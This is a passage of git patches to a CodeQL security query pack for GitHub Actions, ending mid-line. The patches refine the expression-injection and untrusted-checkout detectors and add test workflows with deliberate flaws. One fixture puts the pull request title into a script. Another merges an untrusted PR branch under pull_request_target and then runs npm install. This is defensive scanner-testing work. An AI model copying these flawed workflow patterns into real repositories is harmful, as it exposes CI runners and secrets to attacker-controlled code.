@@ class RunsImpl extends AstNodeImpl, TRunsNode { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - //override AstNodeImpl getAChildNode() { result = this.getAStep() } override CompositeActionImpl getParentNode() { result.getAChildNode() = this } override string getAPrimaryQlClass() { result = "RunsImpl" } @@ -450,7 +431,6 @@ class OutputsImpl extends AstNodeImpl, TOutputsNode { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - //override AstNodeImpl getAChildNode() { result = this.getAnOutputExpr() } override AstNodeImpl getParentNode() { result.getAChildNode() = this } override string getAPrimaryQlClass() { result = "OutputsImpl" } @@ -503,7 +483,6 @@ class StrategyImpl extends AstNodeImpl, TStrategyNode { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - //override ExpressionImpl getAChildNode() { result = this.getAMatrixVarExpr() } override AstNodeImpl getParentNode() { result.getAChildNode() = this } override string getAPrimaryQlClass() { result = "StrategyImpl" } @@ -557,10 +536,8 @@ class JobImpl extends AstNodeImpl, TJobNode { workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n } - // TODO: REMOVE override string toString() { result = "Job: " + jobId } - //override string toString() { result = n.toString() } override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } override WorkflowImpl getParentNode() { result.getAChildNode() = this } @@ -739,7 +716,6 @@ class UsesStepImpl extends StepImpl, UsesImpl { result.getParentNode().getNode() = n.lookup("with").(YamlMapping).lookup(key) } - // TODO: REMOVE override string toString() { if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" } @@ -760,7 +736,6 @@ class ExternalJobImpl extends JobImpl, UsesImpl { ExternalJobImpl() { n.lookup("uses") = u } - //override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } override string getCallee() { if u.getValue().matches("./%") then result = u.getValue().regexpCapture(pathUsesParser(), 1) @@ -796,7 +771,6 @@ class RunImpl extends StepImpl { ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } - // TODO: REMOVE override string toString() { if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" } @@ -807,14 +781,6 @@ class RunImpl extends StepImpl { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ abstract class ContextExpressionImpl extends ExpressionImpl { - // TODO: REMOVE - // ContextExpressionImpl() { - // expression - // .regexpMatch([ - // stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), - // matrixCtxRegex() - // ]) - // } abstract string getFieldName(); abstract AstNodeImpl getTarget(); diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 32d37efdaaea..23ae225e07ed 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -96,6 +96,7 @@ private predicate isExternalUserControlledWorkflowRun(string context) { exists(string reg | reg = [ + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow\\s*\\.\\s*path\\b", "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_branch\\b", "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*display_title\\b", "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_repository\\b\\s*\\.\\s*description\\b", diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 52c2ae6a4833..bda55da5c82a 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -72,7 +72,6 @@ class DataFlowCall instanceof Cfg::Node { /** Gets a textual representation of this element. */ string toString() { result = super.toString() } - //Location getLocation() { result = super.getLocation() } string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } @@ -84,7 +83,6 @@ class DataFlowCall instanceof Cfg::Node { class DataFlowCallable instanceof Cfg::CfgScope { string toString() { result = super.toString() } - //Location getLocation() { result = super.getLocation() } string getName() { if this instanceof ReusableWorkflow then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index fd4f03e1edd8..66a055634c7e 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -34,14 +34,14 @@ module MyFlow = TaintTracking::Global; import MyFlow::PathGraph -from MyFlow::PathNode source, MyFlow::PathNode sink +from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w where MyFlow::flowPath(source, sink) and - source - .getNode() - .asExpr() - .getEnclosingWorkflow() - .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + w = source.getNode().asExpr().getEnclosingWorkflow() and + ( + w instanceof ReusableWorkflow or + w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) + ) select sink.getNode(), source, sink, "Potential expression injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getExpression() diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml new file mode 100644 index 000000000000..0ee850f183d7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml @@ -0,0 +1,100 @@ +name: changelog + +on: + workflow_call: + inputs: + create: + description: Add a log to the changelog + type: boolean + required: false + default: false + update: + description: Update the existing changelog + type: boolean + required: false + default: false + +jobs: + changelog: + runs-on: ubuntu-latest + env: + file: CHANGELOG.md + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Check ${{ env.file }} + run: | + if [[ $(git diff --name-only origin/master HEAD -- ${{ env.file }} | grep '^${{ env.file }}$' -c) -eq 0 ]]; then + echo "Expected '${{ env.file }}' to be modified" + exit 1 + fi + update: + runs-on: ubuntu-latest + needs: changelog + if: (inputs.create && failure()) || (inputs.update && success()) + continue-on-error: true + env: + file: CHANGELOG.md + next_version: next + link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Update ${{ env.file }} from PR title + id: update + uses: actions/github-script@v6 + env: + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + with: + result-encoding: string + script: | + const fs = require('fs'); + const file = './${{ env.file }}'; + let content = fs.readFileSync(file).toString(); + const title = '[${{ env.next_version }}]'; + const log = '${{ env.log }}'; + let exists = ${{ needs.changelog.result == 'success' }}; + + if (!content.includes(title)) { + const insertAt = content.indexOf('\n') + 1; + content = + content.slice(0, insertAt) + + `\n## ${title}\n\n\n` + + content.slice(insertAt); + } + + const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; + if (exists && ${{ github.event.action == 'edited' }}) { + const prevLog = '${{ env.prev_log }}'; + const index = content.indexOf(prevLog, insertAt); + if (index > -1) { + content = content.slice(0, index) + content.slice(index + prevLog.length); + exists = false; + } + } + + if (!exists) { + content = content.slice(0, insertAt) + log + content.slice(insertAt); + fs.writeFileSync(file, content); + return true; + } + + return false; + - name: Setup node + if: fromJson(steps.update.outputs.result) + uses: actions/setup-node@v3 + with: + node-version: 18.x + - name: Commit & Push + if: fromJson(steps.update.outputs.result) + run: | + npm ci + npx prettier --write ${{ env.file }} + git config user.name github-actions[bot] + git config user.email github-actions[bot]@users.noreply.github.com + git add ${{ env.file }} + git commit -m "update ${{ env.file }}" + git push diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml new file mode 100644 index 000000000000..b0a1ea5ed685 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml @@ -0,0 +1,9 @@ +name: '📋' + +on: + pull_request: + branches: [master] + +jobs: + changelog: + uses: ./.github/workflows/changelog.yml From 1bf2431c992f2c45ba9d23b7c970fb271083ab34 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 15:41:57 +0100 Subject: [PATCH 091/707] Improve UntrustedCheckout query Account for more events, more triggers and heuristics to detect git checkouts --- ql/src/Security/CWE-829/UntrustedCheckout.ql | 85 +++++++++++++------ .../CWE-829/.github/workflows/gitcheckout.yml | 23 +++++ 2 files changed, 80 insertions(+), 28 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 865169b3cd94..0b3a2873d516 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -15,39 +15,68 @@ import actions -/** - * An If node that contains an `actor` check - */ -class ActorCheck extends If { - ActorCheck() { +/** An If node that contains an actor, user or label check */ +class ControlCheck extends If { + ControlCheck() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") or - this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.user\\.login.*") + this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.user\\.login.*") or + this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") or + this.getCondition().regexpMatch(".*github\\.event\\.label\\.name.*") } } -/** - * An If node that contains a `label` check - */ -class LabelCheck extends If { - LabelCheck() { - this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") or - this.getCondition().regexpMatch(".*github\\.event\\.label\\.name.*") +bindingset[s] +predicate containsHeadRef(string s) { + s.matches("%" + + [ + "github.event.number", // The pull request number. + "github.event.pull_request.head.ref", // The ref name of head. + "github.event.pull_request.head.sha", // The commit SHA of head. + "github.event.pull_request.id", // The pull request ID. + "github.event.pull_request.number", // The pull request number. + "github.event.pull_request.merge_commit_sha", // The SHA of the merge commit. + "github.head_ref", // The head_ref or source branch of the pull request in a workflow run. + "github.event.workflow_run.head_branch", // The branch of the head commit. + "github.event.workflow_run.head_commit.id", // The SHA of the head commit. + "github.event.workflow_run.head_sha", // The SHA of the head commit. + "env.GITHUB_HEAD_REF", + ] + "%") +} + +/** Checkout of a Pull Request HEAD ref */ +abstract class PRHeadCheckoutStep extends Step { } + +/** Checkout of a Pull Request HEAD ref using actions/checkout action */ +class ActionsCheckout extends PRHeadCheckoutStep instanceof UsesStep { + ActionsCheckout() { + this.getCallee() = "actions/checkout" and + containsHeadRef(this.getArgumentExpr("ref").getExpression()) + } +} + +/** Checkout of a Pull Request HEAD ref using git within a Run step */ +class GitCheckout extends PRHeadCheckoutStep instanceof Run { + GitCheckout() { + exists(string line | + this.getScript().splitAt("\n") = line and + line.regexpMatch(".*git\\s+fetch.*") and + ( + containsHeadRef(line) + or + exists(string varname | + containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and + line.matches("%" + varname + "%") + ) + ) + ) } } -from Workflow w, LocalJob job, UsesStep checkoutStep +from Workflow w, PRHeadCheckoutStep checkout where - w.hasTriggerEvent("pull_request_target") and - w.getAJob() = job and - job.getAStep() = checkoutStep and - checkoutStep.getCallee() = "actions/checkout" and - checkoutStep - .getArgumentExpr("ref") - .getExpression() - .matches([ - "%github.event.pull_request.head.ref%", "%github.event.pull_request.head.sha%", - "%github.event.pull_request.number%", "%github.event.number%", "%github.head_ref%" - ]) and - not exists(ActorCheck check | job.getIf() = check or checkoutStep.getIf() = check) and - not exists(LabelCheck check | job.getIf() = check or checkoutStep.getIf() = check) -select checkoutStep, "Potential unsafe checkout of untrusted pull request on 'pull_request_target'." + w.hasTriggerEvent(["pull_request_target", "issue_comment", "workflow_run"]) and + w.getAJob().(LocalJob).getAStep() = checkout and + not exists(ControlCheck check | + checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check + ) +select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml new file mode 100644 index 000000000000..ab121239c6e1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml @@ -0,0 +1,23 @@ +on: + pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + # 1. Check out the content from an incoming pull request + - run: | + git fetch origin $HEAD_BRANCH + git checkout origin/master + git config user.name "release-hash-check" + git config user.email "<>" + git merge --no-commit --no-edit origin/$HEAD_BRANCH + env: + HEAD_BRANCH: ${{ github.head_ref }} + - uses: actions/setup-node@v1 + # 2. Potentially untrusted commands are being run during "npm install" or "npm build" as + # the build scripts and referenced packages are controlled by the author of the pull request + - run: | + npm install + npm build From 839d16cde563efe235bca401d6959e97a1bdaf47 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 18:41:17 +0100 Subject: [PATCH 092/707] Treat If's values as expression no matter the delimiters --- ql/lib/codeql/actions/Ast.qll | 12 ++ ql/lib/codeql/actions/ast/internal/Ast.qll | 20 ++- ql/src/Security/CWE-829/UntrustedCheckout.ql | 39 ++--- ql/test/library-tests/test.expected | 7 +- ql/test/library-tests/test.ql | 10 ++ .../CriticalExpressionInjection.expected | 4 + .../CWE-094/ExpressionInjection.expected | 4 + .../CWE-829/.github/workflows/auto_ci.yml | 135 ++++++++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 3 + .../CWE-829/UntrustedCheckout.expected | 5 +- 10 files changed, 215 insertions(+), 24 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 3123518d3690..271182a05dd2 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -1,6 +1,16 @@ private import codeql.actions.ast.internal.Ast private import codeql.Locations +module Utils { + bindingset[expr] + string normalizeExpr(string expr) { + result = + expr.regexpReplaceAll("[\\.\\'\\[\\]\"]+", ".") + .regexpReplaceAll("\\.$", "") + .regexpReplaceAll("\\.\\s", " ") + } +} + class AstNode instanceof AstNodeImpl { AstNode getAChildNode() { result = super.getAChildNode() } @@ -188,6 +198,8 @@ class Step extends AstNode instanceof StepImpl { */ class If extends AstNode instanceof IfImpl { string getCondition() { result = super.getCondition() } + + Expression getConditionExpr() { result = super.getConditionExpr() } } abstract class Uses extends AstNode instanceof UsesImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 028f22806807..14f3cd2ecd9c 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -45,6 +45,14 @@ private newtype TAstNode = ) ) ) + or + // if's conditions do not need to be delimted with ${{}} + exists(YamlMapping m | + m.maps(key, value) and + key.(YamlScalar).getValue() = ["if"] and + value.getValue() = raw and + exprOffset = 1 + ) } or TCompositeAction(YamlMapping n) { n instanceof YamlDocument and @@ -123,7 +131,7 @@ class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { override Location getLocation() { result = value.getLocation() } - override YamlNode getNode() { result = value } + override YamlScalar getNode() { result = value } } class ExpressionImpl extends AstNodeImpl, TExpressionNode { @@ -135,15 +143,16 @@ class ExpressionImpl extends AstNodeImpl, TExpressionNode { ExpressionImpl() { this = TExpressionNode(key, value, rawExpression, exprOffset - 1) and - expression = - rawExpression.regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + if rawExpression.trim().regexpMatch("\\$\\{\\{.*\\}\\}") + then expression = rawExpression.trim().regexpCapture("\\$\\{\\{\\s*(.*)\\s*\\}\\}", 1).trim() + else expression = rawExpression.trim() } override string toString() { result = expression } override AstNodeImpl getAChildNode() { none() } - override AstNodeImpl getParentNode() { result.getNode() = value } + override ScalarValueImpl getParentNode() { result.getNode() = value } override string getAPrimaryQlClass() { result = "ExpressionNode" } @@ -638,6 +647,9 @@ class IfImpl extends AstNodeImpl, TIfNode { /** Gets the condition that must be satisfied for this job to run. */ string getCondition() { result = n.(YamlScalar).getValue() } + + /** Gets the condition that must be satisfied for this job to run. */ + ExpressionImpl getConditionExpr() { result.getParentNode().getNode() = n } } class EnvImpl extends AstNodeImpl, TEnvNode { diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 0b3a2873d516..438e3dfe7fc2 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -18,29 +18,32 @@ import actions /** An If node that contains an actor, user or label check */ class ControlCheck extends If { ControlCheck() { - this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") or - this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.user\\.login.*") or - this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") or - this.getCondition().regexpMatch(".*github\\.event\\.label\\.name.*") + Utils::normalizeExpr(this.getCondition()) + .regexpMatch([ + ".*github\\.actor.*", ".*github\\.triggering_actor.*", + ".*github\\.event\\.pull_request\\.user\\.login.*", + ".*github\\.event\\.pull_request\\.labels.*", ".*github\\.event\\.label\\.name.*" + ]) } } bindingset[s] predicate containsHeadRef(string s) { - s.matches("%" + - [ - "github.event.number", // The pull request number. - "github.event.pull_request.head.ref", // The ref name of head. - "github.event.pull_request.head.sha", // The commit SHA of head. - "github.event.pull_request.id", // The pull request ID. - "github.event.pull_request.number", // The pull request number. - "github.event.pull_request.merge_commit_sha", // The SHA of the merge commit. - "github.head_ref", // The head_ref or source branch of the pull request in a workflow run. - "github.event.workflow_run.head_branch", // The branch of the head commit. - "github.event.workflow_run.head_commit.id", // The SHA of the head commit. - "github.event.workflow_run.head_sha", // The SHA of the head commit. - "env.GITHUB_HEAD_REF", - ] + "%") + Utils::normalizeExpr(s) + .matches("%" + + [ + "github.event.number", // The pull request number. + "github.event.pull_request.head.ref", // The ref name of head. + "github.event.pull_request.head.sha", // The commit SHA of head. + "github.event.pull_request.id", // The pull request ID. + "github.event.pull_request.number", // The pull request number. + "github.event.pull_request.merge_commit_sha", // The SHA of the merge commit. + "github.head_ref", // The head_ref or source branch of the pull request in a workflow run. + "github.event.workflow_run.head_branch", // The branch of the head commit. + "github.event.workflow_run.head_commit.id", // The SHA of the head commit. + "github.event.workflow_run.head_sha", // The SHA of the head commit. + "env.GITHUB_HEAD_REF", + ] + "%") } /** Checkout of a Pull Request HEAD ref */ diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 4ef2a2e58755..df8c6ddf9cda 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -190,7 +190,7 @@ parentNodes | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | @@ -415,3 +415,8 @@ calls | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | needs | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +testNormalizeExpr +| foo['bar'] == baz | foo.bar == baz | +| github.event.pull_request.user["login"] | github.event.pull_request.user.login | +| github.event.pull_request.user['login'] | github.event.pull_request.user.login | +| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 8cf97d58ab03..268396a711e3 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -1,4 +1,5 @@ import codeql.actions.Ast +import codeql.actions.Ast::Utils as Utils import codeql.actions.Cfg as Cfg import codeql.actions.DataFlow import codeql.Locations @@ -59,3 +60,12 @@ query predicate summaries(string action, string version, string input, string ou query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } query predicate needs(DataFlow::Node e) { e.asExpr() instanceof NeedsExpression } + +query string testNormalizeExpr(string s) { + s = + [ + "github.event.pull_request.user['login']", "github.event.pull_request.user[\"login\"]", + "github.event.pull_request['user']['login']", "foo['bar'] == baz" + ] and + result = Utils::normalizeExpr(s) +} diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index c9ac215666f7..38884b3eaef4 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected @@ -3,6 +3,7 @@ edges | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | @@ -58,6 +59,8 @@ nodes | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | @@ -187,6 +190,7 @@ nodes subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | steps.remove_quotations.outputs.replaced | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | github.event.issue.body | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index cb924c97ea12..21a9978c54f8 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected @@ -3,6 +3,7 @@ edges | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | @@ -58,6 +59,8 @@ nodes | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | @@ -188,6 +191,7 @@ subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ 